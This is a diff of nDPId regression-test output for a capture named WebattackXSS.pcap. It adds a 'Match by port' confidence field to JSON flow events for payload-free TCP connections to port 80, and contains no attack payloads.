+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347567731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347569321,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347569321,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g25AAD4GQmKsEAABwKgKMuTeAFCWQ7AYAAAAAKACchD+xwAAAgQFtAQCCAoBOzN2AAAAAAEDAwc="}
@@ -1994,17 +1994,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347575652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XdZAAD4GZ\/qsEAABwKgKMuUoAFDuGWRzAAAAAKACchDsHQAAAgQFtAQCCAoBOzmlAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347575652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Sh6374H7hlkdKAScSClFgAAAgQFtAQCCAoD5QsaATs5pQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":1499347575653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347575653,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XddAAD4GaAGsEAABwKgKMuUoAFDuGWR0et++CIAQAOVEHgAAAQEICgE7OaUD5Qsa"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347577925,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347578164,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347578164,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347578164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86A1AAD4G3cKsEAABwKgKMuVCAFCbVdQUAAAAAKACchDMsgAAAgQFtAQCCAoBOzwZAAAAAAEDAwc="}
@@ -2030,17 +2030,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1499347585744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347585744,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CJdAAD4GvTmsEAABwKgKMuWUAFD9vEsXAAAAAKACchDrjwAAAgQFtAQCCAoBO0OAAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":2,"flow_last_seen":1499347585745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347585745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ZQRxaCL\/bxLGKAScSAhRAAAAgQFtAQCCAoD5RT1ATtDgAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5165,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":3,"flow_last_seen":1499347585746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347585746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CJhAAD4GvUCsEAABwKgKMuWUAFD9vEsYEcWgjIAQAOXASwAAAQEICgE7Q4AD5RT1"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
